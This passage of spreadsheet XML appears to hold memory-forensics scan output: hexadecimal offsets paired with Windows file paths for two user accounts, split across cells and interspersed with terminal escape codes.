    <t>0xdfd59c00</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5afe4de1b92fc382.cu</t>
  </si>
  <si>
    <t>stomDestinati</t>
  </si>
  <si>
    <t>ons-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd59eb8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9F371431EED7E7429C6881CA77</t>
  </si>
  <si>
    <t>CC2151_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd5ae50</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\5</t>
  </si>
  <si>
    <t>561251[1].jpg</t>
  </si>
  <si>
    <t>0xdfd5b3c8</t>
  </si>
  <si>
    <t>0xdfd5d318</t>
  </si>
  <si>
    <t>0xdfd5d830</t>
  </si>
  <si>
    <t>554531[1].jpg</t>
  </si>
  <si>
    <t>0xdfd5dd60</t>
  </si>
  <si>
    <t>0xdfd5de18</t>
  </si>
  <si>
    <t>0xdfd5e038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\41CF656D0607A3A72C972F0050</t>
  </si>
  <si>
    <t>BD384A_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd5e260</t>
  </si>
  <si>
    <t>906418[1].jpg</t>
  </si>
  <si>
    <t>0xdfd5f238</t>
  </si>
  <si>
    <t>0xdfd5ff80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9</t>
  </si>
  <si>
    <t>D191FE_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd600d8</t>
  </si>
  <si>
    <t>527E5F_1EC624</t>
  </si>
  <si>
    <t>1AD01BD403B</t>
  </si>
  <si>
    <t>33A802</t>
  </si>
  <si>
    <t>078F6C081_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd60300</t>
  </si>
  <si>
    <t>0xdfd60750</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\0INLUCDT.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd60920</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9EC3B71635F8BA3FC68DE181A1</t>
  </si>
  <si>
    <t>04A0EF_F6C39E</t>
  </si>
  <si>
    <t>F89D8A3A723</t>
  </si>
  <si>
    <t>27D841</t>
  </si>
  <si>
    <t>2589658B2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd61db8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C</t>
  </si>
  <si>
    <t>0xdfd65dc0</t>
  </si>
  <si>
    <t>0xdfd661a0</t>
  </si>
  <si>
    <t>6A5282_C05A70</t>
  </si>
  <si>
    <t>C77091306DD</t>
  </si>
  <si>
    <t>E236B4</t>
  </si>
  <si>
    <t>D483C00F9_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd66b30</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\b</t>
  </si>
  <si>
    <t>g_wide[1].png</t>
  </si>
  <si>
    <t>0xdfd67168</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\84AFE219AEC53B0C9251F5E19E</t>
  </si>
  <si>
    <t>F019BD_2C9D5E</t>
  </si>
  <si>
    <t>6D83DF507CB</t>
  </si>
  <si>
    <t>E6C155</t>
  </si>
  <si>
    <t>21D5D3562_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd67a10</t>
  </si>
  <si>
    <t>0xdfd67bf8</t>
  </si>
  <si>
    <t>sync[1].php_x001B_[</t>
  </si>
  <si>
    <t>0xdfd67f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\1STXV5LP.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd68598</t>
  </si>
  <si>
    <t>0xdfd689e8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2</t>
  </si>
  <si>
    <t>0xdfd69168</t>
  </si>
  <si>
    <t>query.colorbo</t>
  </si>
  <si>
    <t>x-min[1].js</t>
  </si>
  <si>
    <t>0xdfd69330</t>
  </si>
  <si>
    <t>0xdfd69740</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\LS265M28.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd69e50</t>
  </si>
  <si>
    <t>\Windows\System32\imgutil.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6a3d0</t>
  </si>
  <si>
    <t>0xdfd6a488</t>
  </si>
  <si>
    <t>0xdfd6a558</t>
  </si>
  <si>
    <t>0xdfd6a928</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC27</t>
  </si>
  <si>
    <t>98706_93E4B2B</t>
  </si>
  <si>
    <t>A79A897B310</t>
  </si>
  <si>
    <t>0CCB27</t>
  </si>
  <si>
    <t>F2D3BF4F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6ad60</t>
  </si>
  <si>
    <t>A3l4oZ[1].png</t>
  </si>
  <si>
    <t>0xdfd6ae18</t>
  </si>
  <si>
    <t>0xdfd6bcf0</t>
  </si>
  <si>
    <t>2D351_33A56A1</t>
  </si>
  <si>
    <t>24B8529D67F</t>
  </si>
  <si>
    <t>BB7684</t>
  </si>
  <si>
    <t>98950F64_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6bf80</t>
  </si>
  <si>
    <t>0xdfd6c1a0</t>
  </si>
  <si>
    <t>527E5F_DEB946</t>
  </si>
  <si>
    <t>C2B5230DCC8</t>
  </si>
  <si>
    <t>6E0675</t>
  </si>
  <si>
    <t>A23B7E6C8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6c320</t>
  </si>
  <si>
    <t>0xdfd6cd50</t>
  </si>
  <si>
    <t>0xdfd6ce10</t>
  </si>
  <si>
    <t>0xdfd6cec8</t>
  </si>
  <si>
    <t>\Windows\System32\perfos.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6cf80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\~DF73AF9302E5350173.TMP_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6d510</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\a</t>
  </si>
  <si>
    <t>nalytics[1].j</t>
  </si>
  <si>
    <t>0xdfd6d5c8</t>
  </si>
  <si>
    <t>ookieconsent.</t>
  </si>
  <si>
    <t>min[1].js_x001B_[</t>
  </si>
  <si>
    <t>0xdfd6d748</t>
  </si>
  <si>
    <t>prite[1].png_x001B_</t>
  </si>
  <si>
    <t>0xdfd6d858</t>
  </si>
  <si>
    <t>lity\Ease of</t>
  </si>
  <si>
    <t>Access.lnk_x001B_</t>
  </si>
  <si>
    <t>0xdfd6d910</t>
  </si>
  <si>
    <t>lity\Desktop.</t>
  </si>
  <si>
    <t>ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6d9c8</t>
  </si>
  <si>
    <t>B5CCD5_B2E1D7</t>
  </si>
  <si>
    <t>DDAABC2B46E</t>
  </si>
  <si>
    <t>FACDE7</t>
  </si>
  <si>
    <t>7971E3163_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd6db98</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\K</t>
  </si>
  <si>
    <t>0xdfd6f4e8</t>
  </si>
  <si>
    <t>b=gapi[1].js_x001B_</t>
  </si>
  <si>
    <t>0xdfd6f910</t>
  </si>
  <si>
    <t>0xdfd6ff80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata0.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd70f80</t>
  </si>
  <si>
    <t>527E5F_F515B7</t>
  </si>
  <si>
    <t>557E6B9F37A</t>
  </si>
  <si>
    <t>FE74C1</t>
  </si>
  <si>
    <t>886C75038_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd717a8</t>
  </si>
  <si>
    <t>cessories\Acc</t>
  </si>
  <si>
    <t>essibility\</t>
  </si>
  <si>
    <t>Deskto</t>
  </si>
  <si>
    <t>p.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd72260</t>
  </si>
  <si>
    <t>B5CCD5_F6C6B5</t>
  </si>
  <si>
    <t>B787DB26A78</t>
  </si>
  <si>
    <t>ED1FBA</t>
  </si>
  <si>
    <t>2927953E3_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd723c8</t>
  </si>
  <si>
    <t>0xdfd73f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E11E75149C17A93653DA7DC0B</t>
  </si>
  <si>
    <t>0xdfd74230</t>
  </si>
  <si>
    <t>\Windows\System32\sysmain.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd74330</t>
  </si>
  <si>
    <t>0xdfd75038</t>
  </si>
  <si>
    <t>0xdfd75968</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\i</t>
  </si>
  <si>
    <t>ecompatviewli</t>
  </si>
  <si>
    <t>st[1].xml_x001B_[</t>
  </si>
  <si>
    <t>0xdfd77a68</t>
  </si>
  <si>
    <t>85AA5B_F4E75A</t>
  </si>
  <si>
    <t>AF52160899A</t>
  </si>
  <si>
    <t>92AE12</t>
  </si>
  <si>
    <t>446F69552_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd789c8</t>
  </si>
  <si>
    <t>louds1[1].png</t>
  </si>
  <si>
    <t>0xdfd78eb8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\l</t>
  </si>
  <si>
    <t>ogin[1].png_x001B_[</t>
  </si>
  <si>
    <t>0xdfd79308</t>
  </si>
  <si>
    <t>query-1.12.4.</t>
  </si>
  <si>
    <t>0xdfd7a8e8</t>
  </si>
  <si>
    <t>min[1].css_x001B_</t>
  </si>
  <si>
    <t>0xdfd7a9a0</t>
  </si>
  <si>
    <t>0xdfd7ab68</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\WER\ReportArchive_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7ad20</t>
  </si>
  <si>
    <t>0xdfd7b6f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50D6B15D9F2DCE1EDBB0C09862</t>
  </si>
  <si>
    <t>0xdfd7b910</t>
  </si>
  <si>
    <t>0xdfd7bb30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\44S3DB4Q.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7bc30</t>
  </si>
  <si>
    <t>0xdfd7beb8</t>
  </si>
  <si>
    <t>\Windows\Temp\3.bat.unfbt8p.partial_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7c1f8</t>
  </si>
  <si>
    <t>\Program Files\Microsoft Silverlight\xapauthenticodesip.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7c638</t>
  </si>
  <si>
    <t>\Program Files\7-Zip\7-zip.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7c858</t>
  </si>
  <si>
    <t>0xdfd7cbe0</t>
  </si>
  <si>
    <t>iAD0001.000_x001B_[</t>
  </si>
  <si>
    <t>0xdfd7cd60</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B3066</t>
  </si>
  <si>
    <t>0xdfd7cf80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\VITDUJ6O.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7d038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.l</t>
  </si>
  <si>
    <t>0xdfd7d298</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9915FBCE5ECE56452A09FB65ED</t>
  </si>
  <si>
    <t>E2FAD2_D4F323</t>
  </si>
  <si>
    <t>E68BE202AFF</t>
  </si>
  <si>
    <t>DC4D9D</t>
  </si>
  <si>
    <t>8F144710E_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7d580</t>
  </si>
  <si>
    <t>E2FAD2_BAC454</t>
  </si>
  <si>
    <t>A19F45648ED</t>
  </si>
  <si>
    <t>A674EC</t>
  </si>
  <si>
    <t>4E95A3931_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7d700</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\96385D66FC0D184E05CF52F82E</t>
  </si>
  <si>
    <t>F524C0_5F146F</t>
  </si>
  <si>
    <t>572BF4DCA3E</t>
  </si>
  <si>
    <t>33C620</t>
  </si>
  <si>
    <t>B37D44C0C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7d868</t>
  </si>
  <si>
    <t>0xdfd7d920</t>
  </si>
  <si>
    <t>\Windows\System32\msiexec.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7db40</t>
  </si>
  <si>
    <t>\Windows\System32\wshext.dll_x001B_[0K_x001B_[28G</t>
  </si>
  <si>
    <t>0xdfd7df80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata4.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7e1c0</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7e340</t>
  </si>
  <si>
    <t>0xdfd7e6c8</t>
  </si>
  <si>
    <t>0xdfd7e9b0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9E4F776657345B52012CE8E27</t>
  </si>
  <si>
    <t>0xdfd7ec98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FD4CA697E5891F64DDE430D79</t>
  </si>
  <si>
    <t>0xdfd7ef80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9EC3B71635F8BA3FC68DE181A1</t>
  </si>
  <si>
    <t>0xdfd7f440</t>
  </si>
  <si>
    <t>8CF53F_258E13</t>
  </si>
  <si>
    <t>3D9C26B4719</t>
  </si>
  <si>
    <t>49EBD8</t>
  </si>
  <si>
    <t>64CD15AE3_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd7fe48</t>
  </si>
  <si>
    <t>0xdfd7ff00</t>
  </si>
  <si>
    <t>0xdfd80128</t>
  </si>
  <si>
    <t>0xdfd806d8</t>
  </si>
  <si>
    <t>B5CCD5_71A6DD</t>
  </si>
  <si>
    <t>FCCAE55EDD2</t>
  </si>
  <si>
    <t>273B4299B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd80790</t>
  </si>
  <si>
    <t>0xdfd813d8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\v</t>
  </si>
  <si>
    <t>1[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd814a8</t>
  </si>
  <si>
    <t>\Windows\System32\msisip.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd821b0</t>
  </si>
  <si>
    <t>087C84_FD2A0E</t>
  </si>
  <si>
    <t>7223E6D0CF9</t>
  </si>
  <si>
    <t>AB23EE</t>
  </si>
  <si>
    <t>2958CC406_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd82268</t>
  </si>
  <si>
    <t>\Users\Wilfred\ntuser.dat.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd82320</t>
  </si>
  <si>
    <t>85AA5B_5954DA</t>
  </si>
  <si>
    <t>08607BE1685</t>
  </si>
  <si>
    <t>9B1757</t>
  </si>
  <si>
    <t>FC58A3B30_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd82448</t>
  </si>
  <si>
    <t>0xdfd82b30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\m</t>
  </si>
  <si>
    <t>0xdfd83250</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\65P623KZ.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd83308</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9EC3B71635F8BA3FC68DE181A10</t>
  </si>
  <si>
    <t>4A0EF_F6C39EF</t>
  </si>
  <si>
    <t>89D8A3A7232</t>
  </si>
  <si>
    <t>7D8412</t>
  </si>
  <si>
    <t>589658B2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd83ae0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\972AC6CAA9CD91CEC1657BDCCE</t>
  </si>
  <si>
    <t>F0F4D6_4A15A9</t>
  </si>
  <si>
    <t>BF62B3D0A89</t>
  </si>
  <si>
    <t>723146FCD_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd83b98</t>
  </si>
  <si>
    <t>0xdfd85038</t>
  </si>
  <si>
    <t>0xdfd85120</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata8.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd851d8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9915FBCE5ECE56452A09FB65ED</t>
  </si>
  <si>
    <t>E2FAD2_E176EB</t>
  </si>
  <si>
    <t>B8061863792</t>
  </si>
  <si>
    <t>A4B9A0</t>
  </si>
  <si>
    <t>5B6CD66C4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd856a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\v</t>
  </si>
  <si>
    <t>1[2].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd85760</t>
  </si>
  <si>
    <t>\Windows\System32\winshfhc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd86038</t>
  </si>
  <si>
    <t>0xdfd86108</t>
  </si>
  <si>
    <t>\Windows\System32\drprov.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd87218</t>
  </si>
  <si>
    <t>0010005.wsb_x001B_[</t>
  </si>
  <si>
    <t>0xdfd874d8</t>
  </si>
  <si>
    <t>9D314C_F87F06</t>
  </si>
  <si>
    <t>1EF95071982</t>
  </si>
  <si>
    <t>B2CE1A</t>
  </si>
  <si>
    <t>CA6CFD264_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd87af0</t>
  </si>
  <si>
    <t>0xdfd87bb0</t>
  </si>
  <si>
    <t>0xdfd87db8</t>
  </si>
  <si>
    <t>0xdfd8a318</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A8A4FE91A73AA67B7C1B7C8F62</t>
  </si>
  <si>
    <t>83717C_EA0FAE</t>
  </si>
  <si>
    <t>E10AEF6E9D0</t>
  </si>
  <si>
    <t>4E4F82</t>
  </si>
  <si>
    <t>4B39EDE62_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd8b0f0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Updater_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd8b1a8</t>
  </si>
  <si>
    <t>087C84_C69A6F</t>
  </si>
  <si>
    <t>941E6EF88B8</t>
  </si>
  <si>
    <t>485DE9</t>
  </si>
  <si>
    <t>4A86B7BCC_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd8b5b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata3.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd8b870</t>
  </si>
  <si>
    <t>0xdfd8cbf0</t>
  </si>
  <si>
    <t>\Windows\System32\usbperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd91b90</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd92038</t>
  </si>
  <si>
    <t>\Windows\System32\perfts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd921f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171</t>
  </si>
  <si>
    <t>F093969B6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd92370</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2467130D2844BEC28A6B08564C</t>
  </si>
  <si>
    <t>0xdfd92480</t>
  </si>
  <si>
    <t>0xdfd926f8</t>
  </si>
  <si>
    <t>0xdfd929e0</t>
  </si>
  <si>
    <t>8CF53F_EB793E</t>
  </si>
  <si>
    <t>BBAC7A768DF</t>
  </si>
  <si>
    <t>8ECF81</t>
  </si>
  <si>
    <t>091CAD0B1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd92cf0</t>
  </si>
  <si>
    <t>0xdfd92f80</t>
  </si>
  <si>
    <t>\Windows\System32\azroles.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd93100</t>
  </si>
  <si>
    <t>0xdfd931f8</t>
  </si>
  <si>
    <t>\Windows\System32\notepad.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd932b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\024823B39FBEACCDB5C06426A8</t>
  </si>
  <si>
    <t>168E99_71E963</t>
  </si>
  <si>
    <t>68D9B65D311</t>
  </si>
  <si>
    <t>A432DA</t>
  </si>
  <si>
    <t>BED334192_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd934e8</t>
  </si>
  <si>
    <t>0xdfd93858</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpOAV.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd939d8</t>
  </si>
  <si>
    <t>0xdfd93bf8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata7.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd93cb8</t>
  </si>
  <si>
    <t>\Windows\System32\drt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd942b8</t>
  </si>
  <si>
    <t>0xdfd94580</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{DC65B90A-BEC3-415C-920</t>
  </si>
  <si>
    <t>2-43CFEBDD976</t>
  </si>
  <si>
    <t>6}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd94638</t>
  </si>
  <si>
    <t>0xdfd947b8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F12703B35B1F82C21160A92376</t>
  </si>
  <si>
    <t>0xdfd949d8</t>
  </si>
  <si>
    <t>2D351_6E14975</t>
  </si>
  <si>
    <t>B8A4BC68762</t>
  </si>
  <si>
    <t>2C56CD</t>
  </si>
  <si>
    <t>984C4414_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd94bf8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata5.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd94e18</t>
  </si>
  <si>
    <t>0xdfd95038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdfd95218</t>
  </si>
  <si>
    <t>qdefault1MXGL</t>
  </si>
  <si>
    <t>42S.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd95438</t>
  </si>
  <si>
    <t>\Users\Wilfred\ntuser.dat.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd95858</t>
  </si>
  <si>
    <t>0xdfd959d8</t>
  </si>
  <si>
    <t>B2D351_4C0A1E</t>
  </si>
  <si>
    <t>31B519511D8</t>
  </si>
  <si>
    <t>BC6512</t>
  </si>
  <si>
    <t>C6B29ADA4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd95b40</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd95bf8</t>
  </si>
  <si>
    <t>\Users\Wilfred\NTUSER.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd96660</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\UsrClass.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd96a80</t>
  </si>
  <si>
    <t>0xdfd96e00</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F6F92FBF4E8096C9272B135AF6</t>
  </si>
  <si>
    <t>0xdfd96f80</t>
  </si>
  <si>
    <t>0xdfd971e8</t>
  </si>
  <si>
    <t>\Windows\System32\perfdisk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd97c38</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sendmail.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd97e40</t>
  </si>
  <si>
    <t>0xdfd98868</t>
  </si>
  <si>
    <t>0xdfd99320</t>
  </si>
  <si>
    <t>\Users\Wilfred\Music\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9a350</t>
  </si>
  <si>
    <t>0xdfd9aac0</t>
  </si>
  <si>
    <t>0xdfd9ac40</t>
  </si>
  <si>
    <t>B2D351_46E6C4</t>
  </si>
  <si>
    <t>AF527C1C4AA</t>
  </si>
  <si>
    <t>E74C47</t>
  </si>
  <si>
    <t>143588EE2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9b430</t>
  </si>
  <si>
    <t>{146F1A80-4791-11D0-A5D6-28DB04C10000}\жљ бЄ‡ж‹Ћб‡ЏнљҐпїЅм„„_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9b4e8</t>
  </si>
  <si>
    <t>0xdfd9c720</t>
  </si>
  <si>
    <t>0xdfd9c878</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Credentials_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9d750</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{6DEA3FC2-4</t>
  </si>
  <si>
    <t>330-11E9-83AE</t>
  </si>
  <si>
    <t>-08002710B8</t>
  </si>
  <si>
    <t>D0}.da</t>
  </si>
  <si>
    <t>0xdfd9de58</t>
  </si>
  <si>
    <t>mRoot%\System32\svchost.exe -k swprv_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9e1a8</t>
  </si>
  <si>
    <t>\Windows\System32\cmd.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9e848</t>
  </si>
  <si>
    <t>0xdfd9f558</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata6.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9f658</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\RecoverySto</t>
  </si>
  <si>
    <t>re.{0D00C40D-</t>
  </si>
  <si>
    <t>4302-11E9-B</t>
  </si>
  <si>
    <t>A56-08</t>
  </si>
  <si>
    <t>002710B8D0}.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9f710</t>
  </si>
  <si>
    <t>qdefaultDV7RR</t>
  </si>
  <si>
    <t>DUO.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd9fcb0</t>
  </si>
  <si>
    <t>0xdfda0830</t>
  </si>
  <si>
    <t>0xdfda1200</t>
  </si>
  <si>
    <t>0xdfda19f8</t>
  </si>
  <si>
    <t>0xdfda2760</t>
  </si>
